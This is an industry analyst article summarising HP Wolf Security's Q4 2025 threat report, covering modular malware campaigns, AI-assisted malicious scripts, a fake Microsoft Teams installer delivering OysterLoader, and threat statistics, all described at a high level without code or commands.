Attackers embrace AI-assisted development, modular malware kits, and trusted platforms to evade enterprise defenses
Check out Keypoint Intelligence’s Cybersecurity page!
HP recently published its Wolf Security Threat Insights Report, detailing cyberattack trends tracked by the company during Q4 2025, and the results are (sadly, as always) alarming. Drawing on telemetry gathered from customer endpoints protected by HP Sure Click, the report documents a threat environment defined by increasing attacker efficiency: reusable, modular malware components; AI-assisted script development; and the systematic abuse of trusted platforms and legitimate applications to bypass detection. Four notable campaigns illustrate how these trends are playing out in practice.
Modular, Off-the-Shelf Malware Campaigns
A recurring theme in the attack vectors was the use of shared, interchangeable malware components assembled from readily available building blocks. Threat actors launched multiple campaigns using different initial lures and final payloads yet relied on an identical intermediate infection stage. Obfuscated scripts were delivered as email attachments, often disguised using double file extensions (for example, filename.docx.exe) to appear as legitimate Word documents. Once executed, the scripts downloaded images from archive.org—a trusted public domain unlikely to be blocked by enterprise web filters—with malicious .NET code concealed inside. PowerShell extracted and executed the embedded loader through reflective loading, keeping the process in memory and avoiding disk-based detection.
HP’s researchers found that final payloads varied by campaign. DarkCloud, an infostealer with Telegram-based command-and-control, was delivered in one variant, while AsyncRAT was deployed in a parallel campaign targeting organizations in Latin America. The Latin America variant used malicious SVG files impersonating a leading Colombian bank (Bancolombia), which displayed convincing bank-themed pages to trick users into extracting and running password-protected archive contents. The key insight from these campaigns is that low-cost, reusable components allow threat actors to scale operations without significant technical investment, devoting saved effort instead to refining social engineering lures.
“Vibe-Hacking”: AI-Assisted Script Development in the Wild
HP Wolf Security researchers also identified a pattern they describe as “vibe-hacking”: malicious scripts bearing the hallmarks of AI-assisted development: clean structure, verbose comments, and template-style code that operators can easily customize. In one campaign using PDF lures, victims were directed from a compromised website to a malicious download before being immediately redirected to a legitimate site (Booking.com) to create the impression of a trustworthy source. But that “drive-thru” visit to the malicious site was enough: the downloaded scripts ultimately deployed Formbook and XWorm, both capable of stealing browser credentials, cookies, and system information, as well as providing remote access to infected systems.
Notably, the infection chain used a JavaScript downloader followed by a heavily commented PowerShell stage with no obfuscation, structured in a way that suggests it was either purchased with built-in operator instructions or generated using a generative AI tool. A shared .NET loader and dropper appeared across multiple campaigns, pointing to a commercially distributed toolkit. The trend signals that the technical barrier to constructing functional malware chains is continuing to fall, as AI coding assistants enable threat actors with limited development experience to produce operational intermediate stages.
Redirection to a legitimate website to reinforce
trust in the downloaded file (Source: HP)
Fake Microsoft Teams Site Delivers OysterLoader Backdoor
In Q4, malicious executables were the leading threat file type stopped by HP Sure Click, with most delivered through web downloads rather than email. One notable campaign involved attackers building a counterfeit Microsoft Teams website, driving traffic through search engine optimization poisoning and malvertising. Visitors who clicked to download Teams received an installer that silently bundled malicious files with the legitimate Microsoft Teams application, reducing the likelihood that users would notice anything suspicious.
The installer included a signed CapCut executable (dwr.exe) alongside a modified DLL (mpr.dll) and a file named configs.pdf—which was not a genuine PDF, but a malware container. When the installer ran, the signed executable loaded the malicious DLL via sideloading, which in turn opened and unpacked the contents of the fake PDF file. This two-step handoff executed the OysterLoader backdoor. OysterLoader provides persistent attacker access and is frequently observed as a precursor to ransomware deployment. The campaign illustrates how DLL sideloading, combined with signed binaries, bundled legitimate software, and disguised payload containers, can bypass both user suspicion and automated security checks.
Malicious website mimicking Microsoft Teams to deliver malware (Source: HP)
Threat Landscape by the Numbers
HP Sure Click telemetry from Q4 2025 showed scripts and executables as the most prevalent malware delivery type at 38% of threats, up 8 percentage points from Q3. Archives came second at 36%, down 9 points, with ZIP, RAR, GZ, 7Z, and TAR as the most abused formats. Office documents accounted for 11% of threats (up 3 points), PDF files for 8% (down 3 points), and malicious spreadsheets for 4%.
Email remained the dominant delivery vector at 58% of threats, though this represented a 9% decline from Q3, offset by a 7-point rise in malicious web browser downloads to 23%. Notably, at least 14% of e-mail threats caught by HP Sure Click had already bypassed one or more email gateway scanners, up 3 points from the prior quarter—underscoring that gateway filtering alone is insufficient.
Keypoint Intelligence Opinion
The March 2026 HP Wolf Security Threat Insights Report reinforces a direction the endpoint threat landscape has been moving for some time: attackers are becoming more operationally efficient without becoming significantly more technically sophisticated. The modular toolkit model, AI-assisted scripting, and the systematic abuse of trusted services: archive.org, Google Drive, legitimate signed executables—all represent a maturation of attacker techniques rather than a technical breakthrough. The practical effect for defenders is that many traditional detection signals are being systematically neutralized at low cost.
The vibe-hacking observation is particularly worth tracking. If generative AI is enabling less technically skilled operators to assemble functional infection chains, the volume and diversity of attacks may increase even as the average attacker sophistication stays flat or declines. Security teams should expect to see more campaigns with this profile: structurally coherent, well-commented, easily customizable, and ready to deploy with minimal effort.
The persistence of e-mail as the leading threat vector, combined with a worrisome 14% gateway bypass rate, underscores the need for endpoint-level isolation controls. HP Wolf Security's approach of containing threats within micro-VMs before they can reach the host OS is directly relevant to the campaign types documented here, where multi-stage chains rely on reaching the endpoint to execute. Organizations evaluating endpoint security investments should weigh isolation-based approaches alongside traditional detection tools, particularly where e-mail and web download exposure is high.
Stay ahead in the ever-evolving print industry by browsing our Report Store for the latest insights. Log in to the InfoCenter to view related research through our Workplace CompleteView Advisory Service. Not a subscriber? Contact us for more information.